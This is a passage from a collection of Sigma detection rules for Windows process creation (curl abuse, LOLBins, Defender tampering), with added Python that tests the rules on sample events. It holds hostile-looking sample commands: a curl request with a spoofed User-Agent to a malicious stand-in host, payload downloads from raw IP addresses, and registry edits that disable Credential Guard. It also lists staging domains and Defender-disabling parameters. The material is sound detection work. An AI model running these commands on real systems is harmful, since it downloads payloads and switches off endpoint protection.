    "content": "title: Curl Web Request With Potential Custom User-Agent\nid: 85de1f22-d189-44e4-8239-dc276b45379b\nstatus: test\ndescription: Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accepts specific \"User-Agent\" strings\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\nmodified: 2025-12-11\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: This command line would trigger the rule\n    # curl.exe -H \"User-Agent: EvilAgent\" http://malicious.example.com\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_header_flag_1:\n        CommandLine|re: '\\s-H\\s' # Must be Regex as the flag needs to be case sensitive\n    selection_header_flag_2:\n        CommandLine|contains: '--header'\n    selection_user_agent:\n        CommandLine|contains: 'User-Agent:'\n    condition: selection_img and 1 of selection_header_* and selection_user_agent\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml\n"
  },
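Both the Credential Guard registry rule (c17d47b7) and the curl User-Agent rule (85de1f22) above depend on Sigma modifier semantics that are easy to get wrong when a rule is ported by hand to a query language: plain equality, `contains`, `startswith` and `endswith` are case-insensitive, `re` is case-sensitive (which is why the rule matches `-H` with `\s-H\s` rather than with `contains`, so curl's `-h` for help does not fire it), a list of values is OR-ed unless `all` is present, and a list of maps inside a selection is OR-ed too. The Python below is an added example, not Sigma's own code or a pySigma backend: it implements just those semantics, transcribes the two rules' `detection` sections from the YAML above, and evaluates them over constructed process_creation events. The event contents, the `PS` and `CURL` paths and the helper names are assumptions for illustration.

```python
import re

# Sigma string-modifier semantics, reduced to what the two rules use. Per the
# Sigma specification, plain, contains, startswith and endswith comparisons are
# case-insensitive, `re` is a case-sensitive regular expression, and a list of
# values is OR-ed unless the `all` modifier is present.
def _field_matches(value, patterns, modifiers):
    if value is None:
        return False
    if not isinstance(patterns, list):
        patterns = [patterns]
    if "re" in modifiers:
        hits = [re.search(p, value) is not None for p in patterns]
    else:
        v = value.casefold()
        ps = [p.casefold() for p in patterns]
        if "contains" in modifiers:
            hits = [p in v for p in ps]
        elif "startswith" in modifiers:
            hits = [v.startswith(p) for p in ps]
        elif "endswith" in modifiers:
            hits = [v.endswith(p) for p in ps]
        else:
            hits = [v == p for p in ps]
    return all(hits) if "all" in modifiers else any(hits)


def selection_matches(selection, event):
    """A selection map is AND-ed over its fields; a list of maps is OR-ed."""
    if isinstance(selection, list):
        return any(selection_matches(s, event) for s in selection)
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if not _field_matches(event.get(field), patterns, modifiers):
            return False
    return True


# Detection sections transcribed from the YAML above.
CREDENTIAL_GUARD = {  # c17d47b7, condition: all of selection_*
    "selection_img": [
        {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe", "\\reg.exe"]},
        {"OriginalFileName": ["PowerShell.EXE", "pwsh.dll", "reg.exe"]},
    ],
    "selection_cli": {"CommandLine|contains": [
        "add ", "New-ItemProperty ", "Set-ItemProperty ", "si ",
        "delete ", "del ", "Remove-ItemProperty ", "rp "]},
    "selection_key_base": {"CommandLine|contains": [
        "\\Control\\DeviceGuard", "\\Control\\LSA",
        "Software\\Policies\\Microsoft\\Windows\\DeviceGuard"]},
    "selection_key_specific": {"CommandLine|contains": [
        "EnableVirtualizationBasedSecurity", "RequirePlatformSecurityFeatures", "LsaCfgFlags"]},
}

CURL_USER_AGENT = {  # 85de1f22, condition: selection_img and 1 of selection_header_* and selection_user_agent
    "selection_img": [{"Image|endswith": "\\curl.exe"}, {"OriginalFileName": "curl.exe"}],
    "selection_header_flag_1": {"CommandLine|re": r"\s-H\s"},
    "selection_header_flag_2": {"CommandLine|contains": "--header"},
    "selection_user_agent": {"CommandLine|contains": "User-Agent:"},
}


def credential_guard_fires(event):
    return all(selection_matches(s, event) for s in CREDENTIAL_GUARD.values())


def curl_user_agent_fires(event):
    sel = lambda name: selection_matches(CURL_USER_AGENT[name], event)
    headers = [n for n in CURL_USER_AGENT if n.startswith("selection_header_")]
    return sel("selection_img") and any(sel(n) for n in headers) and sel("selection_user_agent")


# Constructed process_creation events (not real telemetry).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CURL = "C:\\Windows\\System32\\curl.exe"
EVENTS = {
    # verb in upper case: `contains` is case-insensitive, so 'add ' still hits
    "reg_clear_lsacfgflags": {"Image": "C:\\Windows\\System32\\reg.exe", "OriginalFileName": "reg.exe",
        "CommandLine": "reg ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v LsaCfgFlags /t REG_DWORD /d 0 /f"},
    "ps_disable_vbs": {"Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell -c \"Set-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard -Name EnableVirtualizationBasedSecurity -Value 0\""},
    # read-only query of the same value: no add/set/delete verb, so no alert
    "ps_query_only": {"Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell -c \"Get-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\LSA -Name LsaCfgFlags\""},
    "curl_header_ua": {"Image": CURL, "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://203.0.113.5/stage2"},
    # curl's dedicated -A/--user-agent option is outside this rule's selection
    "curl_user_agent_option": {"Image": CURL, "OriginalFileName": "curl.exe",
        "CommandLine": "curl.exe --user-agent EvilAgent http://203.0.113.5/stage2"},
}


def evaluate_all():
    """name -> (credential_guard_fires, curl_user_agent_fires)"""
    return {n: (credential_guard_fires(e), curl_user_agent_fires(e)) for n, e in EVENTS.items()}


if __name__ == "__main__":
    for name, hits in evaluate_all().items():
        print(f"{name:24s} credguard={hits[0]!s:5s} curl_ua={hits[1]}")
```

The `curl_user_agent_option` event is the caveat a practitioner should note: a custom User-Agent set through `-A` or `--user-agent` never contains the literal `User-Agent:` header, so it is out of scope for 85de1f22 as written.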
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml",
    "content": "title: File Download From IP URL Via Curl.EXE\nid: 9cc85849-3b02-4cb5-b371-3a1ff54f2218\nrelated:\n    - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043\n      type: similar\nstatus: test\ndescription: Detects file downloads directly from IP address URL using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    filter_main_ext:\n        # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043\n        CommandLine|endswith:\n            - '.bat'\n            - '.bat\"'\n            - '.dat'\n            - '.dat\"'\n            - '.dll'\n            - '.dll\"'\n            - '.exe'\n            - '.exe\"'\n            - '.gif'\n            - '.gif\"'\n            - '.hta'\n            - '.hta\"'\n            - '.jpeg'\n            - '.jpeg\"'\n            - '.log'\n            - '.log\"'\n            - '.msi'\n            - '.msi\"'\n            - '.png'\n            - '.png\"'\n            - '.ps1'\n            - '.ps1\"'\n            - '.psm1'\n            - '.psm1\"'\n            - '.vbe'\n            - '.vbe\"'\n            - '.vbs'\n            - 
'.vbs\"'\n            - \".bat'\"\n            - \".dat'\"\n            - \".dll'\"\n            - \".exe'\"\n            - \".gif'\"\n            - \".hta'\"\n            - \".jpeg'\"\n            - \".log'\"\n            - \".msi'\"\n            - \".png'\"\n            - \".ps1'\"\n            - \".psm1'\"\n            - \".vbe'\"\n            - \".vbs'\"\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml",
    "content": "title: Suspicious File Download From IP Via Curl.EXE\nid: 5cb299fc-5fb1-4d07-b989-0644c68b6043\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\n    - https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    selection_ext:\n        # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218\n        CommandLine|endswith:\n            - '.bat'\n            - '.bat\"'\n            - '.dat'\n            - '.dat\"'\n            - '.dll'\n            - '.dll\"'\n            - '.exe'\n            - '.exe\"'\n            - '.gif'\n            - '.gif\"'\n            - '.hta'\n            - '.hta\"'\n            - '.jpeg'\n            - '.jpeg\"'\n            - '.log'\n            - '.log\"'\n            - '.msi'\n            - '.msi\"'\n            - '.png'\n            - '.png\"'\n            - '.ps1'\n            - '.ps1\"'\n            - '.psm1'\n            - '.psm1\"'\n            - '.vbe'\n            - '.vbe\"'\n            - '.vbs'\n            - '.vbs\"'\n            - \".bat'\"\n     
       - \".dat'\"\n            - \".dll'\"\n            - \".exe'\"\n            - \".gif'\"\n            - \".hta'\"\n            - \".jpeg'\"\n            - \".log'\"\n            - \".msi'\"\n            - \".png'\"\n            - \".ps1'\"\n            - \".psm1'\"\n            - \".vbe'\"\n            - \".vbs'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml\n"
  },
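The two curl rules above, 9cc85849 (medium) and 5cb299fc (high), share every selection except the extension list, which the first applies as `filter_main_ext` and the second as `selection_ext`, so for any one command line at most one of them fires. The Python below is an added example, not part of the Sigma project: it encodes that relationship, with the shared IP regex, flag and extension lists transcribed from the YAML, and checks the partition on constructed command lines. The `which_rule_fires` helper and the `CASES` command lines are assumptions for illustration; Image and OriginalFileName are taken as already matched.

```python
import re

# Selections shared by rules 9cc85849 (medium) and 5cb299fc (high), transcribed
# from the YAML above; assumes Image/OriginalFileName already identified curl.exe.
IP_URL_RE = re.compile(r"://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
# Sigma `contains` is case-insensitive, so the rule's ' -O' also matches ' -o'
# (curl's short form of --output); everything below is compared casefolded.
OUTPUT_FLAGS = (" -o", "--remote-name", "--output")
# filter_main_ext of 9cc85849 and selection_ext of 5cb299fc list the same
# extensions, each bare, followed by a double quote, or followed by a single quote.
SUSP_EXTENSIONS = ("bat", "dat", "dll", "exe", "gif", "hta", "jpeg",
                   "log", "msi", "png", "ps1", "psm1", "vbe", "vbs")
SUSP_SUFFIXES = tuple(f".{ext}{quote}" for ext in SUSP_EXTENSIONS for quote in ("", '"', "'"))


def common_selections_hit(command_line):
    """selection_ip and selection_http and selection_flag, identical in both rules."""
    folded = command_line.casefold()
    return (IP_URL_RE.search(command_line) is not None
            and "http" in folded
            and any(flag in folded for flag in OUTPUT_FLAGS))


def susp_extension_hit(command_line):
    """CommandLine|endswith over the shared extension list."""
    return command_line.casefold().endswith(SUSP_SUFFIXES)


def which_rule_fires(command_line):
    """Return '5cb299fc', '9cc85849' or None. Never both: the high rule's
    selection_ext is exactly the medium rule's filter_main_ext."""
    if not common_selections_hit(command_line):
        return None
    return "5cb299fc" if susp_extension_hit(command_line) else "9cc85849"


# Constructed command lines for illustration, not real telemetry.
CASES = {
    "exe_to_public": "curl -o C:\\Users\\Public\\svc.exe http://198.51.100.7/svc.exe",
    "exe_quoted": 'curl http://198.51.100.7/a --output "C:\\Users\\Public\\svc.exe"',
    "text_file": "curl -o notes.txt http://198.51.100.7/notes.txt",   # .txt is in neither list
    "hostname_url": "curl -O http://files.example.test/tool.exe",      # no IP literal in the URL
    "no_output_flag": "curl http://198.51.100.7/tool.exe",             # nothing written to disk
    "bogus_octets": "curl -o a.exe http://999.999.999.999/a.exe",      # regex does not validate octets
}


def classify_all():
    return {name: which_rule_fires(cmd) for name, cmd in CASES.items()}


if __name__ == "__main__":
    for name, rule in classify_all().items():
        print(f"{name:16s} -> {rule}")
```

Two points follow from the cases. The rule comments already ask for the two extension lists to be edited together; if they drift apart, a command line can fire both rules or neither, which `which_rule_fires` would expose. And `[0-9]{1,3}` accepts octets above 255, so the IP selection is a cheap literal check rather than address validation, which is fine for a process-creation rule but worth knowing when reading the alert.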
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml",
    "content": "title: Suspicious File Download From File Sharing Domain Via Curl.EXE\nid: 56454143-524f-49fb-b1c6-3fb8b1ad41fb\nstatus: test\ndescription: Detects potentially suspicious file download from file sharing domains using curl.exe\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_websites:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        CommandLine|contains:\n            - ' -O'  # covers the alias 
for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    selection_ext:\n        CommandLine|endswith:\n            - \".ps1\"\n            - \".ps1'\"\n            - '.ps1\"'\n            - \".dat\"\n            - \".dat'\"\n            - '.dat\"'\n            - \".msi\"\n            - \".msi'\"\n            - '.msi\"'\n            - \".bat\"\n            - \".bat'\"\n            - '.bat\"'\n            - \".exe\"\n            - \".exe'\"\n            - '.exe\"'\n            - \".vbs\"\n            - \".vbs'\"\n            - '.vbs\"'\n            - \".vbe\"\n            - \".vbe'\"\n            - '.vbe\"'\n            - \".hta\"\n            - \".hta'\"\n            - '.hta\"'\n            - \".dll\"\n            - \".dll'\"\n            - '.dll\"'\n            - \".psm1\"\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml",
    "content": "title: Insecure Transfer Via Curl.EXE\nid: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"--insecure\" flag.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-30\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        - CommandLine|re: '\\s-k\\s'\n        - CommandLine|contains: '--insecure'\n    condition: all of selection_*\nfalsepositives:\n    - Access to badly maintained internal or development systems\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml",
    "content": "title: Insecure Proxy/DOH Transfer Via Curl.EXE\nid: 2c1486f5-02e8-4f86-9099-b97f2da4ed77\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"--proxy-insecure\" or \"--doh-insecure\" flag, which disables TLS certificate verification for the proxy connection or the DNS-over-HTTPS resolver respectively.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '--doh-insecure'\n            - '--proxy-insecure'\n    condition: all of selection_*\nfalsepositives:\n    - Access to badly maintained internal or development systems\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml",
    "content": "title: Local File Read Using Curl.EXE\nid: aa6f6ea6-0676-40dd-b510-6e46f02d8867\nstatus: test\ndescription: Detects execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-27\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - OriginalFileName: 'curl.exe'\n    selection_cli:\n        CommandLine|contains: 'file:///'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_curl_susp_download.yml",
    "content": "title: Suspicious Curl.EXE Download\nid: e218595b-bbe7-4ee5-8a96-f32a24ad3468\nrelated:\n    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution\n      type: derived\n    - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download\n      type: similar\nstatus: test\ndescription: Detects a suspicious curl process start on Windows and outputs the requested document to a local file\nreferences:\n    - https://twitter.com/max_mal_/status/1542461200797163522\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\n    - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt\n    - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-07-03\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_curl:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_susp_locations:\n        CommandLine|contains:\n            - '%AppData%'\n            - '%Public%'\n            - '%Temp%'\n            - '%tmp%'\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n            - 'C:\\PerfLogs\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Windows\\Temp\\'\n    selection_susp_extensions:\n        CommandLine|endswith:\n            - '.dll'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.png'\n            - '.temp'\n            - '.tmp'\n            - '.txt'\n            - '.vbe'\n   
         - '.vbs'\n    filter_optional_git_windows:\n        # Example FP\n        #   CommandLine: \"C:\\Program Files\\Git\\mingw64\\bin\\curl.exe\" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt\n        ParentImage: 'C:\\Program Files\\Git\\usr\\bin\\sh.exe'\n        Image: 'C:\\Program Files\\Git\\mingw64\\bin\\curl.exe'\n        CommandLine|contains|all:\n            - '--silent --show-error --output '\n            - 'gfw-httpget-'\n            - 'AppData'\n    condition: selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Curl Download File\n      technique: T1105\n      atomic_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_customshellhost_susp_exec.yml",
    "content": "title: Suspicious CustomShellHost Execution\nid: 84b14121-9d14-416e-800b-f3b829c5a14d\nstatus: test\ndescription: |\n    Detects child processes of CustomShellHost.exe other than 'C:\\Windows\\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/180\n    - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2025-10-29\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\CustomShellHost.exe'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are unlikely, investigate matches carefully.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml",
    "content": "title: ManageEngine Endpoint Central Dctask64.EXE Potential Abuse\nid: 6345b048-8441-43a7-9bed-541133633d7a\nstatus: test\ndescription: |\n    Detects the execution of \"dctask64.exe\", a binary signed by ZOHO Corporation and shipped as part of ManageEngine Endpoint Central.\n    This binary can be abused for DLL injection and arbitrary command and process execution.\nreferences:\n    - https://twitter.com/gN3mes1s/status/1222088214581825540\n    - https://twitter.com/gN3mes1s/status/1222095963789111296\n    - https://twitter.com/gN3mes1s/status/1222095371175911424\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-28\nmodified: 2025-01-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dctask64.exe'\n        - Hashes|contains:\n              - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'\n              - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'\n              - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'\n              - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'\n    selection_cli:\n        CommandLine|contains:\n            - ' executecmd64 '\n            - ' invokeexe '\n            - ' injectDll '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Defaultpack.EXE\nid: b2309017-4235-44fe-b5af-b15363011957\nstatus: test\ndescription: Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/\n    - https://www.echotrail.io/insights/search/defaultpack.exe\nauthor: frack113\ndate: 2022-12-31\nmodified: 2024-04-22\ntags:\n    - attack.t1218\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DefaultPack.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defender_default_action_modified.yml",
    "content": "title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'\nid: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e\nrelated:\n    - id: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').\n    This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.\n    An attacker might use this technique via the command line to bypass defenses before executing payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\n    - https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952\n    - https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmdlet:\n        CommandLine|contains: 'Set-MpPreference'\n    selection_action:\n        CommandLine|contains:\n            - '-LowThreatDefaultAction'\n            - '-ModerateThreatDefaultAction'\n            - '-HighThreatDefaultAction'\n            - '-SevereThreatDefaultAction'\n            - '-ltdefac '\n            - '-mtdefac '\n            - '-htdefac '\n            - '-stdefac '\n    selection_value:\n        CommandLine|contains:\n            - 'Allow'\n            - '6'\n            - 'NoAction'\n            - '9'\n    condition: all of selection_*\nfalsepositives:\n    - Highly unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defender_remove_context_menu.yml",
    "content": "title: Windows Defender Context Menu Removed\nid: b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b\nrelated:\n    - id: 72a0369a-2576-4aaf-bfc9-6bb24a574ac6\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.\n    This action removes the \"Scan with Microsoft Defender\" option from the right-click menu for files, directories, and drives.\n    Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.\nreferences:\n    - https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n    - https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_action:\n        CommandLine|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'ri '\n    selection_reg_path:\n        CommandLine|contains: '\\shellex\\ContextMenuHandlers\\EPP'\n    condition: all of selection_*\nfalsepositives:\n    - May be part of a system customization or \"debloating\" script, but this is highly unusual in a managed corporate environment.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml",
